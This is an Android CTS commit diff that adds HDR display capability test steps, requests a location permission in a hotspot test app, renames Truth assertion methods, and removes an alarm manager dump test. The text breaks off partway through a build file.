diff options
author | android-build-team Robot <android-build-team-robot@google.com> | 2021-03-18 20:16:54 +0000 |
---|---|---|
committer | android-build-team Robot <android-build-team-robot@google.com> | 2021-03-18 20:16:54 +0000 |
commit | 15a0ff416e9dde3748289755c371596ceb95abe1 (patch) | |
tree | ff0ad2abd6756b4f87b43de7d642109cf9c0d14b | |
parent | 58f78e015df18e4c56cc02559889506240636376 (diff) | |
parent | 142075e927c209bd54b4e6329386eb749bd5d097 (diff) | |
download | cts-android11-mainline-cellbroadcast-release.tar.gz |
Snap for 7218917 from 142075e927c209bd54b4e6329386eb749bd5d097 to mainline-cellbroadcast-releaseandroid-mainline-11.0.0_r37android-mainline-11.0.0_r26android11-mainline-cellbroadcast-release
Change-Id: I0fbedcc7b070e620e2babd4238f3f79f0df085e0
213 files changed, 6512 insertions, 936 deletions
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java index 72a34baddb5..3eab9f42541 100644 --- a/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java +++ b/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java @@ -75,6 +75,140 @@ public class DisplayHdrCapabilitiesTestActivity extends TvAppVerifierActivity { mTestSequence.init(); } + private static class NonHdrDisplayTestStep extends SyncTestStep { + + public NonHdrDisplayTestStep(TvAppVerifierActivity context) { + super( + context, + R.string.tv_hdr_capabilities_test_step_non_hdr_display, + getInstructionText(context), + getButtonStringId()); + } + + private static String getInstructionText(Context context) { + return context.getString( + R.string.tv_hdr_connect_no_hdr_display, context.getString(getButtonStringId())); + } + + private static @StringRes int getButtonStringId() { + return R.string.tv_start_test; + } + + @Override + public void runTest() { + DisplayManager displayManager = mContext.getSystemService(DisplayManager.class); + Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY); + getAsserter().withMessage("Display.isHdr()").that(display.isHdr()).isFalse(); + getAsserter() + .withMessage("Display.getHdrCapabilities()") + .that(display.getHdrCapabilities().getSupportedHdrTypes()) + .isEmpty(); + } + } + + private static class HdrDisplayTestStep extends SyncTestStep { + + public HdrDisplayTestStep(TvAppVerifierActivity context) { + super( + context, + R.string.tv_hdr_capabilities_test_step_hdr_display, + getInstructionText(context), + getButtonStringId()); + } + + private static String getInstructionText(Context context) { + return context.getString( + R.string.tv_hdr_connect_hdr_display, context.getString(getButtonStringId())); + } + + private static @StringRes int getButtonStringId() { + return R.string.tv_start_test; + } + + @Override + public void runTest() { + DisplayManager displayManager = mContext.getSystemService(DisplayManager.class); + Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY); + + getAsserter().withMessage("Display.isHdr()").that(display.isHdr()).isTrue(); + + Display.HdrCapabilities hdrCapabilities = display.getHdrCapabilities(); + + int[] supportedHdrTypes = hdrCapabilities.getSupportedHdrTypes(); + Arrays.sort(supportedHdrTypes); + + getAsserter() + .withMessage("Display.getHdrCapabilities().getSupportedTypes()") + .that(supportedHdrTypes) + .isEqualTo( + new int[] { + Display.HdrCapabilities.HDR_TYPE_DOLBY_VISION, + Display.HdrCapabilities.HDR_TYPE_HDR10, + Display.HdrCapabilities.HDR_TYPE_HDR10_PLUS, + Display.HdrCapabilities.HDR_TYPE_HLG + }); + + float maxLuminance = hdrCapabilities.getDesiredMaxLuminance(); + getAsserter() + .withMessage("Display.getHdrCapabilities().getDesiredMaxLuminance()") + .that(maxLuminance) + .isIn(Range.openClosed(0f, MAX_EXPECTED_LUMINANCE)); + + float minLuminance = hdrCapabilities.getDesiredMinLuminance(); + getAsserter() + .withMessage("Display.getHdrCapabilities().getDesiredMinLuminance()") + .that(minLuminance) + .isIn(Range.closedOpen(0f, MAX_EXPECTED_LUMINANCE)); + + getAsserter() + .withMessage("Display.getHdrCapabilities().getDesiredMaxAverageLuminance()") + .that(hdrCapabilities.getDesiredMaxAverageLuminance()) + .isIn(Range.openClosed(minLuminance, maxLuminance)); + } + } + + private static class NoDisplayTestStep extends AsyncTestStep { + public NoDisplayTestStep(TvAppVerifierActivity context) { + super( + context, + R.string.tv_hdr_capabilities_test_step_no_display, + getInstructionText(context), + getButtonStringId()); + } + + private static String getInstructionText(Context context) { + return context.getString( + R.string.tv_hdr_disconnect_display, + context.getString(getButtonStringId()), + DISPLAY_DISCONNECT_WAIT_TIME_SECONDS, + DISPLAY_DISCONNECT_WAIT_TIME_SECONDS + 1); + } + + private static @StringRes int getButtonStringId() { + return R.string.tv_start_test; + } + + @Override + public void runTestAsync() { + // Wait for the user to disconnect the display. + final long delay = Duration.ofSeconds(DISPLAY_DISCONNECT_WAIT_TIME_SECONDS).toMillis(); + mContext.getPostTarget().postDelayed(this::runTest, delay); + } + + private void runTest() { + try { + // Verify the display APIs do not crash when the display is disconnected + DisplayManager displayManager = mContext.getSystemService(DisplayManager.class); + Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY); + display.isHdr(); + display.getHdrCapabilities(); + } catch (Exception e) { + getAsserter().withMessage(Throwables.getStackTraceAsString(e)).fail(); + } + done(); + } + } + private static class TvPanelReportedTypesAreSupportedTestStep extends YesNoTestStep { public TvPanelReportedTypesAreSupportedTestStep(TvAppVerifierActivity context) { super(context, getInstructionText(context), R.string.tv_yes, R.string.tv_no); diff --git a/apps/hotspot/AndroidManifest.xml b/apps/hotspot/AndroidManifest.xml index 277be5fa117..fd8b04593b3 100644 --- a/apps/hotspot/AndroidManifest.xml +++ b/apps/hotspot/AndroidManifest.xml @@ -5,6 +5,7 @@ <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /> + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <application> <activity android:name=".MainActivity"> <intent-filter> diff --git a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java index 2e0ed876e7d..eb815637182 100644 --- a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java +++ b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java @@ -16,5 +16,11 @@ public class MainActivity extends Activity { ActivityCompat.requestPermissions( this, new String[] {Manifest.permission.ACCESS_COARSE_LOCATION}, 2); } + + if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) + != PackageManager.PERMISSION_GRANTED) { + ActivityCompat.requestPermissions( + this, new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 2); + } } } diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java index 571a1b822ea..5a6a5efdfad 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java @@ -118,7 +118,7 @@ public class RetryRuleTest { new RetryableStatement<RetryableException>(3, sRetryableException, cleaner), mDescription).evaluate()); - assertThat(actualException).isSameAs(sRetryableException); + assertThat(actualException).isSameInstanceAs(sRetryableException); verify(cleaner, times(2)).run(); } @@ -143,7 +143,7 @@ public class RetryRuleTest { final RetryableException actualException = expectThrows(RetryableException.class, () -> rule.apply(mMockStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(exception); + assertThat(actualException).isSameInstanceAs(exception); verify(mMockStatement, times(1)).evaluate(); verify(cleaner, never()).run(); } @@ -169,7 +169,7 @@ public class RetryRuleTest { () -> rule.apply(new RetryableStatement<RetryableException>(2, sRetryableException), mDescription).evaluate()); - assertThat(actualException).isSameAs(sRetryableException); + assertThat(actualException).isSameInstanceAs(sRetryableException); } @Test @@ -190,7 +190,7 @@ public class RetryRuleTest { final RetryableException actualException = expectThrows(RetryableException.class, () -> rule.apply(mMockStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(exception); + assertThat(actualException).isSameInstanceAs(exception); verify(mMockStatement, times(1)).evaluate(); } @@ -203,7 +203,7 @@ public class RetryRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mMockStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(exception); + assertThat(actualException).isSameInstanceAs(exception); verify(mMockStatement, times(1)).evaluate(); } } diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java index a56d7b28569..9c82a1e0259 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java @@ -75,7 +75,7 @@ public class SafeCleanerRuleTest { final SafeCleanerRule rule = new SafeCleanerRule(); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); } @Test @@ -83,7 +83,7 @@ public class SafeCleanerRuleTest { final SafeCleanerRule rule = new SafeCleanerRule().setDumper(mDumper); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mDumper).dump("Whatever", actualException); } @@ -94,7 +94,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyExtraExceptions1).call(); } @@ -107,7 +107,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyExtraExceptions1).call(); verify(mDumper).dump("Whatever", actualException); @@ -122,7 +122,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); @@ -140,7 +140,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); @@ -156,7 +156,7 @@ public class SafeCleanerRuleTest { .run(mGoodGuyRunner2); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); @@ -173,7 +173,7 @@ public class SafeCleanerRuleTest { .run(mGoodGuyRunner2); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); @@ -189,7 +189,7 @@ public class SafeCleanerRuleTest { .run(mGoodGuyRunner2); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java index 9b1851e5c6b..7559ddcf586 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java @@ -117,7 +117,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("newValue"); @@ -134,7 +134,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, never()).set(anyString()); } @@ -148,7 +148,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("newValue"); @@ -164,7 +164,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("sameValue"); diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java index 4599acaebb2..becf0794f58 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java @@ -74,7 +74,7 @@ public class StateKeeperRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("before"); verifyNoMoreInteractions(mStateManager); // Make sure set() was not called again @@ -100,7 +100,7 @@ public class StateKeeperRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, never()).set(anyString()); } diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java index 8992d181556..fdc4de6ee92 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java @@ -105,7 +105,7 @@ public class TimeoutTest { final Timeout timeout = new Timeout(mSleeper, NAME, 100, 2, 500); final Object result = new Object(); when(mJob.call()).thenReturn(result); - assertThat(timeout.run(DESC, 1, mJob)).isSameAs(result); + assertThat(timeout.run(DESC, 1, mJob)).isSameInstanceAs(result); assertThat(mSleeper.totalSleepingTime).isEqualTo(0); } @@ -114,7 +114,7 @@ public class TimeoutTest { final Timeout timeout = new Timeout(mSleeper, NAME, 100, 2, 500); final Object result = new Object(); when(mJob.call()).thenReturn((Object) null, result); - assertThat(timeout.run(DESC, 10, mJob)).isSameAs(result); + assertThat(timeout.run(DESC, 10, mJob)).isSameInstanceAs(result); assertThat(mSleeper.totalSleepingTime).isEqualTo(10); } @@ -124,7 +124,7 @@ public class TimeoutTest { final RetryableException e = expectThrows(RetryableException.class, () -> timeout.run(DESC, 10, mJob)); assertThat(e.getMessage()).contains(DESC); - assertThat(e.getTimeout()).isSameAs(timeout); + assertThat(e.getTimeout()).isSameInstanceAs(timeout); assertThat(mSleeper.totalSleepingTime).isEqualTo(100); } diff --git a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java index c5e72b9c65b..8088411e290 100644 --- a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java +++ b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java @@ -208,7 +208,7 @@ public final class CompatChangesValidConfigTest extends CompatChangeGatingTestCa * The device may contain extra changes, but none may be removed. */ public void testDeviceContainsExpectedConfig() throws Exception { - assertThat(getOnDeviceCompatConfig()).containsAllIn(getExpectedCompatConfig()); + assertThat(getOnDeviceCompatConfig()).containsAtLeastElementsIn(getExpectedCompatConfig()); } } diff --git a/hostsidetests/appsecurity/Android.bp b/hostsidetests/appsecurity/Android.bp index 3a569dba5ab..30a6ba3a03d 100644 --- a/hostsidetests/appsecurity/Android.bp +++ b/hostsidetests/appsecurity/Android.bp @@ -40,7 +40,8 @@ java_test_host { "cts", "vts10", "general-tests", - "mts", + "mts-documentsui", + "mts-mediaprovider", "sts", ], diff --git a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java index 1da1202b5de..eef1577579a 100644 --- a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java +++ b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java @@ -93,6 +93,7 @@ public class AppLinkTest extends InstrumentationTestCase { private Intent getHttpIntent() { Intent i = new Intent(Intent.ACTION_VIEW); i.addCategory(Intent.CATEGORY_BROWSABLE); + i.addCategory(Intent.CATEGORY_DEFAULT); i.setData(Uri.parse("http://com.android.cts.intent.receiver")); return i; } diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java index 9873fb2f212..b9a8041e108 100644 --- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java +++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java @@ -621,7 +621,7 @@ public class ManagedProfileCrossProfileTest extends BaseManagedProfileTest { throws Exception { Set<String> currentPids = new HashSet<>( Arrays.asList(getAppPid(packageName).split(" "))); - assertThat(currentPids).containsAllIn(pids); + assertThat(currentPids).containsAtLeastElementsIn(pids); } private void assertAppKilledInBothProfiles(String packageName, List<String> pids) diff --git a/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java b/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java deleted file mode 100644 index 8093dc36aea..00000000000 --- a/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java +++ /dev/null @@ -1,219 +0,0 @@ -/* - * Copyright (C) 2016 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package com.android.server.cts; - -import com.android.server.AlarmClockMetadataProto; -import com.android.server.AlarmManagerServiceDumpProto; -import com.android.server.AlarmProto; -import com.android.server.BatchProto; -import com.android.server.BroadcastStatsProto; -import com.android.server.ConstantsProto; -import com.android.server.FilterStatsProto; -import com.android.server.AppStateTrackerProto; -import com.android.server.AppStateTrackerProto.RunAnyInBackgroundRestrictedPackages; -import com.android.server.IdleDispatchEntryProto; -import com.android.server.InFlightProto; -import com.android.server.WakeupEventProto; -import java.util.List; - -/** - * Test to check that the alarm manager service properly outputs its dump state. - */ -public class AlarmManagerIncidentTest extends ProtoDumpTestCase { - public void testAlarmManagerServiceDump() throws Exception { - final AlarmManagerServiceDumpProto dump = - getDump(AlarmManagerServiceDumpProto.parser(), "dumpsys alarm --proto"); - - verifyAlarmManagerServiceDumpProto(dump, PRIVACY_NONE); - } - - static void verifyAlarmManagerServiceDumpProto(AlarmManagerServiceDumpProto dump, final int filterLevel) throws Exception { - // Times should be positive. - assertTrue(0 < dump.getCurrentTime()); - assertTrue(0 < dump.getElapsedRealtime()); - // Can be 0 if the time hasn't been changed yet. - assertTrue(0 <= dump.getLastTimeChangeClockTime()); - assertTrue(0 <= dump.getLastTimeChangeRealtime()); - - // ConstantsProto - ConstantsProto settings = dump.getSettings(); - assertTrue(0 < settings.getMinFuturityDurationMs()); - assertTrue(0 < settings.getMinIntervalDurationMs()); - assertTrue(0 < settings.getListenerTimeoutDurationMs()); - assertTrue(0 < settings.getAllowWhileIdleShortDurationMs()); - assertTrue(0 < settings.getAllowWhileIdleLongDurationMs()); - assertTrue(0 < settings.getAllowWhileIdleWhitelistDurationMs()); - - // AppStateTrackerProto - AppStateTrackerProto appStateTracker = dump.getAppStateTracker(); - for (int uid : appStateTracker.getForegroundUidsList()) { - // 0 is technically a valid UID. - assertTrue(0 <= uid); - } - for (int aid : appStateTracker.getPowerSaveWhitelistAppIdsList()) { - assertTrue(0 <= aid); - } - for (int aid : appStateTracker.getTempPowerSaveWhitelistAppIdsList()) { - assertTrue(0 <= aid); - } - for (RunAnyInBackgroundRestrictedPackages r : appStateTracker.getRunAnyInBackgroundRestrictedPackagesList()) { - assertTrue(0 <= r.getUid()); - } - - if (!dump.getIsInteractive()) { - // These are only valid if is_interactive is false. - assertTrue(0 < dump.getTimeSinceNonInteractiveMs()); - assertTrue(0 < dump.getMaxWakeupDelayMs()); - assertTrue(0 < dump.getTimeSinceLastDispatchMs()); - // time_until_next_non_wakeup_delivery_ms could be negative if the delivery time is in the past. - } - - assertTrue(0 < dump.getTimeUntilNextWakeupMs()); - assertTrue(0 < dump.getTimeSinceLastWakeupMs()); - assertTrue(0 < dump.getTimeSinceLastWakeupSetMs()); - assertTrue(0 <= dump.getTimeChangeEventCount()); - - for (int aid : dump.getDeviceIdleUserWhitelistAppIdsList()) { - assertTrue(0 <= aid); - } - - // AlarmClockMetadataProto - for (AlarmClockMetadataProto ac : dump.getNextAlarmClockMetadataList()) { - assertTrue(0 <= ac.getUser()); - assertTrue(0 < ac.getTriggerTimeMs()); - } - - for (BatchProto b : dump.getPendingAlarmBatchesList()) { - final long start = b.getStartRealtime(); - final long end = b.getEndRealtime(); - assertTrue("Batch start time (" + start+ ") is negative", 0 <= start); - assertTrue("Batch end time (" + end + ") is negative", 0 <= end); - assertTrue("Batch start time (" + start + ") is after its end time (" + end + ")", - start <= end); - testAlarmProtoList(b.getAlarmsList(), filterLevel); - } - - testAlarmProtoList(dump.getPendingUserBlockedBackgroundAlarmsList(), filterLevel); - - testAlarmProto(dump.getPendingIdleUntil(), filterLevel); - - testAlarmProtoList(dump.getPendingWhileIdleAlarmsList(), filterLevel); - - testAlarmProto(dump.getNextWakeFromIdle(), filterLevel); - - testAlarmProtoList(dump.getPastDueNonWakeupAlarmsList(), filterLevel); - - assertTrue(0 <= dump.getDelayedAlarmCount()); - assertTrue(0 <= dump.getTotalDelayTimeMs()); - assertTrue(0 <= dump.getMaxDelayDurationMs()); - assertTrue(0 <= dump.getMaxNonInteractiveDurationMs()); - - assertTrue(0 <= dump.getBroadcastRefCount()); - assertTrue(0 <= dump.getPendingIntentSendCount()); - assertTrue(0 <= dump.getPendingIntentFinishCount()); - assertTrue(0 <= dump.getListenerSendCount()); - assertTrue(0 <= dump.getListenerFinishCount()); - - for (InFlightProto f : dump.getOutstandingDeliveriesList()) { - assertTrue(0 <= f.getUid()); - assertTrue(0 < f.getWhenElapsedMs()); - testBroadcastStatsProto(f.getBroadcastStats()); - testFilterStatsProto(f.getFilterStats(), filterLevel); - if (filterLevel == PRIVACY_AUTO) { - assertTrue(f.getTag().isEmpty()); - } - } - - for (AlarmManagerServiceDumpProto.LastAllowWhileIdleDispatch l : dump.getLastAllowWhileIdleDispatchTimesList()) { - assertTrue(0 <= l.getUid()); - assertTrue(0 < l.getTimeMs()); - } - - for (AlarmManagerServiceDumpProto.TopAlarm ta : dump.getTopAlarmsList()) { - assertTrue(0 <= ta.getUid()); - testFilterStatsProto(ta.getFilter(), filterLevel); - } - - for (AlarmManagerServiceDumpProto.AlarmStat as : dump.getAlarmStatsList()) { - testBroadcastStatsProto(as.getBroadcast()); - for (FilterStatsProto f : as.getFiltersList()) { - testFilterStatsProto(f, filterLevel); - } - } - - for (IdleDispatchEntryProto id : dump.getAllowWhileIdleDispatchesList()) { - assertTrue(0 <= id.getUid()); - assertTrue(0 <= id.getEntryCreationRealtime()); - assertTrue(0 <= id.getArgRealtime()); - if (filterLevel == PRIVACY_AUTO) { - assertTrue(id.getTag().isEmpty()); - } - } - - for (WakeupEventProto we : dump.getRecentWakeupHistoryList()) { - assertTrue(0 <= we.getUid()); - assertTrue(0 <= we.getWhen()); - } - } - - private static void testAlarmProtoList(List<AlarmProto> alarms, final int filterLevel) throws Exception { - for (AlarmProto a : alarms) { - testAlarmProto(a, filterLevel); - } - } - - private static void testAlarmProto(AlarmProto alarm, final int filterLevel) throws Exception { - assertNotNull(alarm); - - if (filterLevel == PRIVACY_AUTO) { - assertTrue(alarm.getTag().isEmpty()); - assertTrue(alarm.getListener().isEmpty()); - } - // alarm.time_until_when_elapsed_ms can be negative if 'when' is in the past. - assertTrue(0 <= alarm.getWindowLengthMs()); - assertTrue(0 <= alarm.getRepeatIntervalMs()); - assertTrue(0 <= alarm.getCount()); - } - - private static void testBroadcastStatsProto(BroadcastStatsProto broadcast) throws Exception { - assertNotNull(broadcast); - - assertTrue(0 <= broadcast.getUid()); - assertTrue(0 <= broadcast.getTotalFlightDurationMs()); - assertTrue(0 <= broadcast.getCount()); - assertTrue(0 <= broadcast.getWakeupCount()); - assertTrue(0 <= broadcast.getStartTimeRealtime()); - // Nesting should be non-negative. - assertTrue(0 <= broadcast.getNesting()); - } - - private static void testFilterStatsProto(FilterStatsProto filter, final int filterLevel) throws Exception { - assertNotNull(filter); - - if (filterLevel == PRIVACY_AUTO) { - assertTrue(filter.getTag().isEmpty()); - } - assertTrue(0 <= filter.getLastFlightTimeRealtime()); - assertTrue(0 <= filter.getTotalFlightDurationMs()); - assertTrue(0 <= filter.getCount()); - assertTrue(0 <= filter.getWakeupCount()); - assertTrue(0 <= filter.getStartTimeRealtime()); - // Nesting should be non-negative. - assertTrue(0 <= filter.getNesting()); - } -} - diff --git a/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java b/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java index a2622095684..5b74593705c 100644 --- a/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java +++ b/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java @@ -69,8 +69,6 @@ public class IncidentdTest extends ProtoDumpTestCase { ActivityManagerIncidentTest.verifyActivityManagerServiceDumpProcessesProto(dump.getAmprocesses(), filterLevel); - AlarmManagerIncidentTest.verifyAlarmManagerServiceDumpProto(dump.getAlarm(), filterLevel); - // GraphicsStats is expected to be all AUTOMATIC. WindowManagerIncidentTest.verifyWindowManagerServiceDumpProto(dump.getWindow(), filterLevel); diff --git a/hostsidetests/scopedstorage/Android.bp b/hostsidetests/scopedstorage/Android.bp index 480e2d3a8e4..44f4905b2de 100644 --- a/hostsidetests/scopedstorage/Android.bp +++ b/hostsidetests/scopedstorage/Android.bp @@ -19,7 +19,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppB", @@ -28,7 +28,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppC", @@ -37,7 +37,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppCLegacy", @@ -47,7 +47,7 @@ android_test_helper_app { target_sdk_version: "28", srcs: 